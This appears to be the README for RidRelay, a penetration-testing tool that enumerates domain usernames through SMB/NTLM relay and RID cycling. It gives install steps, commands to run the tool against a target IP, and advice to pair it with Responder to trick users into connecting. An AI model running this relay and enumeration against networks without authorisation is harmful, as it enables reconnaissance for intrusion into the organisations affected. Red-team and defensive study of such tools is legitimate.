Enumerate usernames on a domain where you have no creds by using SMB Relay with low priv.
Quick and easy way to get domain usernames while on an internal network.
Hit me up: @skorov8
RidRelay combines the NTLM Relay attack, common lsarpc based queries and RID cycling to get a list of domain usernames. It takes these steps:
(For best results, use with Responder)
pipenv install
pipenv shell
# Optional: Run if installing impacket
git submodule update --init --recursive
cd submodules/impacket
pip install .
cd ../..
First, find a target host to relay to. The target must be a member of the domain and MUST have SMB Signing off. CrackMapExec can get this info for you very quick!
Start RidRelay pointing to the target:
python ridrelay.py -t 10.0.0.50
OR
Also output usernames to file
python ridrelay.py -t 10.0.0.50 -o path_to_output.txt
Highly Recommended: Start Responder to trick users to connecting to RidRelay
Mad props go to: